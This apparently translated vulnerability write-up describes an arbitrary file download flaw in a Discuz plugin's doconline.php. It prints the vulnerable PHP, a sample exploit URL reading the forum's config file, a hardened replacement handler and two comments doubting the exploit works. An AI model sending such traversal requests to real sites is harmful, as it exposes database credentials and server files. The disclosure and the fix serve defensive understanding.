Arbitrary Local File Download Vulnerability in a Discuz Plugin

Author: y0umer

Plugin download address: http://www.discuz.net/forum.php?mod=viewthread&tid=3169556

Now look at the code:

[php]
<?php
// User-controlled path; the only change made to it is the "../../../" prefix
$doc=$_GET['doc'];
$doc="../../../".$doc;
$filename=$_GET['filename'];
$ext=$_GET['ext'];
// Set the file type
if($ext=='doc') {$_ext="application/msword";}
if($ext=='xls') {$_ext="application/vnd.ms-excel";}
if($ext=='ppt') {$_ext="application/vnd.ms-powerpoint";}
if($ext=='docx') {$_ext="application/vnd.openxmlformats-officedocument.wordprocessingml.template";}
if($ext=='xlsx') {$_ext="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet";}
if($ext=='pptx') {$_ext="application/vnd.openxmlformats-officedocument.presentationml.presentation";}
if($ext=='pdf') {$_ext="application/pdf";}
if($ext=='txt') {$_ext="application/plain";}
// Set the response headers
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Type:'.$_ext);
header('Content-Length:'.filesize($doc));
// Read the file
readfile($doc);
?>
[/php]

Surprisingly, $doc is passed to readfile() without any processing at all: the only change is the "../../../" prefix, so the request itself decides which file is read.

http://0day5.com/source/plugin/doconline/doconline.php?doc=/config/config_global_default.php
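
A hardened version of the handler above, written as an added example and not taken from the plugin or its author. DOC_BASE, DOC_TYPES and resolve_doc() are assumed names, and the directory path is a placeholder. It confines the resolved path to one directory and derives the type from the file itself instead of the `ext` parameter.

```php
<?php
// Added example, not the plugin's code. DOC_BASE is an assumed placeholder directory.
const DOC_BASE = '/var/www/discuz/data/doconline';
// Extension allowlist; the MIME type is taken from the resolved file name.
const DOC_TYPES = [
    'doc'  => 'application/msword',
    'xls'  => 'application/vnd.ms-excel',
    'ppt'  => 'application/vnd.ms-powerpoint',
    'docx' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
    'xlsx' => 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
    'pptx' => 'application/vnd.openxmlformats-officedocument.presentationml.presentation',
    'pdf'  => 'application/pdf',
    'txt'  => 'text/plain',
];

// Returns [realPath, mime] for a permitted file, or null to reject.
function resolve_doc(string $base, string $requested): ?array
{
    $root = realpath($base);
    // realpath() collapses "../" and resolves symlinks; it is false if the file is missing.
    $path = strpos($requested, "\0") === false
        ? realpath($base . DIRECTORY_SEPARATOR . $requested)
        : false;
    if ($root === false || $path === false || !is_file($path)) {
        return null;
    }
    // The resolved path must still sit inside the base directory.
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return array_key_exists($ext, DOC_TYPES) ? [$path, DOC_TYPES[$ext]] : null;
}

$doc = $_GET['doc'] ?? '';
$hit = is_string($doc) ? resolve_doc(DOC_BASE, $doc) : null;
if ($hit === null) {
    http_response_code(404);
    exit;
}
[$path, $mime] = $hit;
// Keep only safe characters so the value cannot break out of the header.
$given = $_GET['filename'] ?? null;
$name = preg_replace('/[^A-Za-z0-9._-]/', '_', is_string($given) ? $given : basename($path));
header('Content-Type: ' . $mime);
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

With this check, a `doc` value that resolves outside DOC_BASE, or to a file whose extension is not in the allowlist (a `.php` config file, for instance), gets a 404 instead of the file contents.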

2 comments

  1. jon

    Not a single test succeeded. This one is too marginal to be useful.

    1. 0day5
      @jon

      It is about as marginal as it could possibly be to begin with.
